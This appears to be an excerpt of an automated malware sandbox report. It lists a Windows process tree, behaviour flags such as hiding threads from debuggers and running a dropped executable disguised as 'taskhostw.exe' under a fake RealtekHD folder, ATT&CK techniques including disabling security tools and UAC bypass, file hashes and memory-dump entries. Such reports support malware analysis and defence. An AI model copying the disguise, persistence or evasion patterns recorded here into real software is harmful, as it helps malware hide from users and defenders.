C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -s Browser1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 7164 -s 7722⤵
- Program crash
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1328 -s 7442⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4452 -s 7442⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6604 -s 7362⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6604 -s 7482⤵
- Program crash
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x0 /state0:0xa3aa6055 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
3Hidden Files and Directories
3Account Manipulation
1Registry Run Keys / Startup Folder
4Winlogon Helper DLL
1Scheduled Task
1Defense Evasion
Modify Registry
12Disabling Security Tools
3Hidden Files and Directories
3Bypass User Account Control
1File Deletion
2Impair Defenses
1File Permissions Modification
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.datMD5
9d9fbd528242d845d92a84b3832b22b0
SHA18e8b2e12d281651cfe90fe741c5780be01cbc661
SHA256059c5b62c4cd41f9abe7c0dcfec55d9baff3484e4a51e2bb239a0c681d9fef8c
SHA512de12be6a2218823ba811e2b190b1497549168358e7543003655f518ae43bae08dead71c76e270f6634262d89b18a0ae3a0744778b3922e966af108654f7aa7d6
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.datMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PRICache\1601268389\1361672858.priMD5
050f862ebe4280881ec261b7de17a5eb
SHA1f88837dcc7727abd92298f2868a4e603e36dd4ae
SHA2565a9ee4039e88417093c55cfb4c7b7aea8c5f09695a111fd1c2a78b170536afb4
SHA512b77852e2179808744c1d0234d93f6a11dc7c1b74f2f2951af6b21bce10a0fba95b643af159c64ab3168074855cd26aa30aa625a8363f69b1dd98ca49c90b14b3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PRICache\4183903823\97717462.priMD5
b6001b9e5fc5c3d537375f572212762b
SHA1f03b0351d2730994e847d9afcf118395c331e400
SHA2560ee6fb6ae927f06a3f74721d0a2be1d7b2158e171e9d32b68747121054e7f910
SHA512918db362fd4f49d8720c34299dcc1f119bc7a0981f48d9939fcad29e14c58262daab23a131cd386437587bf8084a1dce43a58218dec757074e0004794db1129b
-
\??\pipe\crashpad_2736_BPXZPCUXSRKEAOXMMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/212-134-0x0000000000000000-mapping.dmp
-
memory/512-211-0x0000000000000000-mapping.dmp
-
memory/692-182-0x0000000000000000-mapping.dmp
-
memory/940-207-0x0000000000000000-mapping.dmp
-
memory/1040-406-0x00007FF7F2D00000-0x00007FF7F2D10000-memory.dmpFilesize
64KB
-
memory/1200-119-0x0000000000000000-mapping.dmp
-
memory/1204-178-0x0000000000000000-mapping.dmp
-
memory/1208-174-0x0000000000000000-mapping.dmp
-
memory/1208-205-0x0000000000000000-mapping.dmp
-
memory/1264-120-0x0000000000000000-mapping.dmp
-
memory/1316-175-0x0000000000A10000-0x0000000000ABE000-memory.dmpFilesize
696KB
-
memory/1316-170-0x0000000000400000-0x00000000009B6000-memory.dmpFilesize
5.7MB
-
memory/1316-168-0x0000000000400000-0x00000000009B6000-memory.dmpFilesize
5.7MB
-
memory/1316-163-0x0000000000000000-mapping.dmp
-
memory/1332-198-0x0000000000000000-mapping.dmp
-
memory/1392-197-0x0000000000000000-mapping.dmp
-
memory/1464-607-0x000002A0EDAE0000-0x000002A0EDAF7000-memory.dmpFilesize
92KB
-
memory/1644-196-0x0000000000000000-mapping.dmp
-
memory/1688-201-0x0000000000000000-mapping.dmp
-
memory/1824-209-0x0000000002910000-0x0000000002911000-memory.dmpFilesize
4KB
-
memory/1824-588-0x0000000002F00000-0x0000000002F17000-memory.dmpFilesize
92KB
-
memory/2172-164-0x0000000000000000-mapping.dmp
-
memory/2196-194-0x0000000000000000-mapping.dmp
-
memory/2356-212-0x0000000000000000-mapping.dmp
-
memory/2360-590-0x0000026DD1DF0000-0x0000026DD1E07000-memory.dmpFilesize
92KB
-
memory/2416-543-0x0000000002A40000-0x0000000002CCD000-memory.dmpFilesize
2.6MB
-
memory/2416-544-0x0000000000400000-0x0000000000AAD000-memory.dmpFilesize
6.7MB
-
memory/2448-589-0x0000020C02350000-0x0000020C02367000-memory.dmpFilesize
92KB
-
memory/2508-187-0x0000000000000000-mapping.dmp
-
memory/2696-592-0x000001E6E3A20000-0x000001E6E3A37000-memory.dmpFilesize
92KB
-
memory/2724-173-0x0000000000B00000-0x0000000000C4A000-memory.dmpFilesize
1.3MB
-
memory/2724-169-0x0000000000400000-0x00000000009B6000-memory.dmpFilesize
5.7MB
-
memory/2724-162-0x0000000000000000-mapping.dmp
-
memory/2724-167-0x0000000000400000-0x00000000009B6000-memory.dmpFilesize
5.7MB
-
memory/2772-200-0x0000000000000000-mapping.dmp
-
memory/2980-593-0x000001BE24E10000-0x000001BE24E27000-memory.dmpFilesize
92KB
-
memory/2996-193-0x0000000000000000-mapping.dmp
-
memory/3132-399-0x0000000001322000-0x0000000001324000-memory.dmpFilesize
8KB
-
memory/3132-597-0x000000001D6D0000-0x000000001D6E7000-memory.dmpFilesize
92KB
-
memory/3132-398-0x0000000001320000-0x0000000001322000-memory.dmpFilesize
8KB
-
memory/3288-177-0x0000000000000000-mapping.dmp
-
memory/3400-586-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB
-
memory/3500-591-0x000001BE3EF90000-0x000001BE3EFA7000-memory.dmpFilesize
92KB
-
memory/3516-195-0x0000000000000000-mapping.dmp
-
memory/3620-176-0x0000000005DC0000-0x0000000005DE2000-memory.dmpFilesize
136KB
-
memory/3620-128-0x0000000004B80000-0x000000000507E000-memory.dmpFilesize
5.0MB
-
memory/3620-124-0x0000000000280000-0x00000000002D2000-memory.dmpFilesize
328KB
-
memory/3620-125-0x0000000000BD0000-0x0000000000BE4000-memory.dmpFilesize
80KB
-
memory/3620-142-0x0000000002580000-0x0000000002588000-memory.dmpFilesize
32KB
-
memory/3620-144-0x0000000005920000-0x00000000059B2000-memory.dmpFilesize
584KB
-
memory/3620-127-0x0000000005080000-0x000000000557E000-memory.dmpFilesize
5.0MB
-
memory/3620-123-0x0000000000280000-0x00000000002D2000-memory.dmpFilesize
328KB
-
memory/3620-153-0x0000000004B80000-0x000000000507E000-memory.dmpFilesize
5.0MB
-
memory/3620-147-0x0000000005900000-0x0000000005908000-memory.dmpFilesize
32KB
-
memory/3620-148-0x0000000005D70000-0x0000000005DB4000-memory.dmpFilesize
272KB
-
memory/3640-199-0x0000000000000000-mapping.dmp
-
memory/3704-190-0x0000000000000000-mapping.dmp
-
memory/3720-213-0x0000000000000000-mapping.dmp
-
memory/3732-179-0x0000000000000000-mapping.dmp
-
memory/3860-133-0x0000000000000000-mapping.dmp
-
memory/3952-136-0x0000000000400000-0x0000000000AB9000-memory.dmpFilesize
6.7MB
-
memory/3952-135-0x0000000000000000-mapping.dmp
-
memory/3952-137-0x0000000000400000-0x0000000000AB9000-memory.dmpFilesize
6.7MB
-
memory/3952-141-0x0000000000CF0000-0x0000000000CF1000-memory.dmpFilesize
4KB
-
memory/4140-126-0x0000000000000000-mapping.dmp
-
memory/4156-121-0x0000000000000000-mapping.dmp
-
memory/4156-122-0x00000000021E0000-0x00000000021EF000-memory.dmpFilesize
60KB
-
memory/4192-594-0x0000020A65600000-0x0000020A65617000-memory.dmpFilesize
92KB
-
memory/4196-132-0x0000000000000000-mapping.dmp
-
memory/4196-188-0x0000000000000000-mapping.dmp
-
memory/4320-180-0x0000000000000000-mapping.dmp
-
memory/4328-216-0x0000017263A90000-0x0000017263A92000-memory.dmpFilesize
8KB
-
memory/4328-227-0x0000017263A90000-0x0000017263A92000-memory.dmpFilesize
8KB
-
memory/4328-220-0x0000017263A90000-0x0000017263A92000-memory.dmpFilesize
8KB
-
memory/4328-222-0x000001727DA00000-0x000001727DA02000-memory.dmpFilesize
8KB
-
memory/4328-223-0x000001727DA03000-0x000001727DA05000-memory.dmpFilesize
8KB
-
memory/4328-217-0x0000017263A90000-0x0000017263A92000-memory.dmpFilesize
8KB
-
memory/4328-215-0x0000017263A90000-0x0000017263A92000-memory.dmpFilesize
8KB
-
memory/4328-225-0x0000017263A90000-0x0000017263A92000-memory.dmpFilesize
8KB
-
memory/4328-214-0x0000017263A90000-0x0000017263A92000-memory.dmpFilesize
8KB
-
memory/4328-226-0x0000017263A90000-0x0000017263A92000-memory.dmpFilesize
8KB
-
memory/4328-221-0x000001727D970000-0x000001727D992000-memory.dmpFilesize
136KB
-
memory/4328-228-0x0000017263A90000-0x0000017263A92000-memory.dmpFilesize
8KB
-
memory/4328-229-0x000001727E6E0000-0x000001727E756000-memory.dmpFilesize
472KB
-
memory/4328-230-0x0000017263A90000-0x0000017263A92000-memory.dmpFilesize
8KB
-
memory/4328-231-0x0000017263A90000-0x0000017263A92000-memory.dmpFilesize
8KB
-
memory/4328-267-0x000001727DA06000-0x000001727DA08000-memory.dmpFilesize
8KB
-
memory/4332-203-0x0000000000000000-mapping.dmp
-
memory/4348-391-0x0000000000400000-0x00000000004A2000-memory.dmpFilesize
648KB
-
memory/4352-158-0x0000000000400000-0x0000000000AB9000-memory.dmpFilesize
6.7MB
-
memory/4352-165-0x00000000001E0000-0x00000000001E1000-memory.dmpFilesize
4KB
-
memory/4352-156-0x0000000000400000-0x0000000000AB9000-memory.dmpFilesize
6.7MB
-
memory/4380-154-0x0000000000000000-mapping.dmp
-
memory/4496-152-0x0000000000000000-mapping.dmp
-
memory/4508-204-0x0000000000000000-mapping.dmp
-
memory/4516-172-0x0000000000000000-mapping.dmp
-
memory/4576-181-0x0000000000000000-mapping.dmp
-
memory/4584-613-0x00000232CA7C0000-0x00000232CA7D7000-memory.dmpFilesize
92KB
-
memory/4584-615-0x00000232CA870000-0x00000232CA880000-memory.dmpFilesize
64KB
-
memory/4584-614-0x00000232CA7B0000-0x00000232CA7C0000-memory.dmpFilesize
64KB
-
memory/4584-616-0x00000232CA810000-0x00000232CA820000-memory.dmpFilesize
64KB
-
memory/4584-617-0x00000232CA870000-0x00000232CA880000-memory.dmpFilesize
64KB
-
memory/4608-210-0x0000000000000000-mapping.dmp
-
memory/4620-159-0x0000000000000000-mapping.dmp
-
memory/4628-192-0x0000000000000000-mapping.dmp
-
memory/4628-160-0x0000000000000000-mapping.dmp
-
memory/4632-191-0x0000000000000000-mapping.dmp
-
memory/4644-157-0x0000000000000000-mapping.dmp
-
memory/4672-185-0x0000000000000000-mapping.dmp
-
memory/4728-143-0x0000000000000000-mapping.dmp
-
memory/4748-202-0x0000000000000000-mapping.dmp
-
memory/4756-189-0x0000000000000000-mapping.dmp
-
memory/4768-171-0x0000000000000000-mapping.dmp
-
memory/4812-149-0x0000000000400000-0x0000000000AB9000-memory.dmpFilesize
6.7MB
-
memory/4812-150-0x0000000000400000-0x0000000000AB9000-memory.dmpFilesize
6.7MB
-
memory/4812-208-0x0000000000000000-mapping.dmp
-
memory/4812-146-0x0000000000000000-mapping.dmp
-
memory/4812-155-0x0000000000AC0000-0x0000000000B6E000-memory.dmpFilesize
696KB
-
memory/4828-206-0x0000000000000000-mapping.dmp
-
memory/4832-145-0x0000000000C50000-0x0000000000C51000-memory.dmpFilesize
4KB
-
memory/4832-139-0x0000000000400000-0x0000000000AB9000-memory.dmpFilesize
6.7MB
-
memory/4832-140-0x0000000000400000-0x0000000000AB9000-memory.dmpFilesize
6.7MB
-
memory/4832-138-0x0000000000000000-mapping.dmp
-
memory/4852-129-0x0000000000000000-mapping.dmp
-
memory/4852-186-0x0000000000000000-mapping.dmp
-
memory/4864-151-0x0000000000000000-mapping.dmp
-
memory/4992-224-0x0000000000AC0000-0x0000000000C0A000-memory.dmpFilesize
1.3MB
-
memory/4992-218-0x0000000000400000-0x00000000009B6000-memory.dmpFilesize
5.7MB
-
memory/4992-166-0x0000000000000000-mapping.dmp
-
memory/4992-219-0x0000000000400000-0x00000000009B6000-memory.dmpFilesize
5.7MB
-
memory/5056-130-0x0000000000000000-mapping.dmp
-
memory/5060-131-0x0000000000000000-mapping.dmp
-
memory/5080-183-0x0000000000000000-mapping.dmp
-
memory/5088-161-0x0000000000000000-mapping.dmp
-
memory/5096-184-0x0000000000000000-mapping.dmp
-
memory/5200-595-0x000001403B080000-0x000001403B097000-memory.dmpFilesize
92KB
-
memory/5304-601-0x0000015D03050000-0x0000015D03056000-memory.dmpFilesize
24KB
-
memory/5304-608-0x0000015D1B8C4000-0x0000015D1B8C5000-memory.dmpFilesize
4KB
-
memory/5304-583-0x0000015D009D0000-0x0000015D0146C000-memory.dmpFilesize
10.6MB
-
memory/5304-582-0x0000015D009D0000-0x0000015D0146C000-memory.dmpFilesize
10.6MB
-
memory/5304-598-0x0000015D03020000-0x0000015D03037000-memory.dmpFilesize
92KB
-
memory/5304-604-0x0000015D1B8C0000-0x0000015D1B8C2000-memory.dmpFilesize
8KB
-
memory/5304-605-0x0000015D1B8C2000-0x0000015D1B8C4000-memory.dmpFilesize
8KB
-
memory/5304-600-0x0000015D1B8D0000-0x0000015D1C8E6000-memory.dmpFilesize
16.1MB
-
memory/5344-606-0x000001BC42EA0000-0x000001BC42EB7000-memory.dmpFilesize
92KB
-
memory/5344-609-0x000001BC42ED0000-0x000001BC42ED1000-memory.dmpFilesize
4KB
-
memory/5344-610-0x000001BC42ED0000-0x000001BC42F10000-memory.dmpFilesize
256KB
-
memory/5448-596-0x000001AC0D1A0000-0x000001AC0D1B7000-memory.dmpFilesize
92KB
-
memory/5452-603-0x0000025B92060000-0x0000025B92077000-memory.dmpFilesize
92KB
-
memory/5492-581-0x0000000004BC0000-0x0000000004BC1000-memory.dmpFilesize
4KB
-
memory/5872-599-0x000001DAE1CB0000-0x000001DAE1CC7000-memory.dmpFilesize
92KB
-
memory/6760-602-0x000001CA1BF90000-0x000001CA1BFA7000-memory.dmpFilesize
92KB
-
memory/7056-611-0x0000000005530000-0x0000000005547000-memory.dmpFilesize
92KB
-
memory/7056-587-0x0000000000400000-0x0000000000417000-memory.dmpFilesize
92KB
-
memory/7064-612-0x000001C151F70000-0x000001C151F87000-memory.dmpFilesize
92KB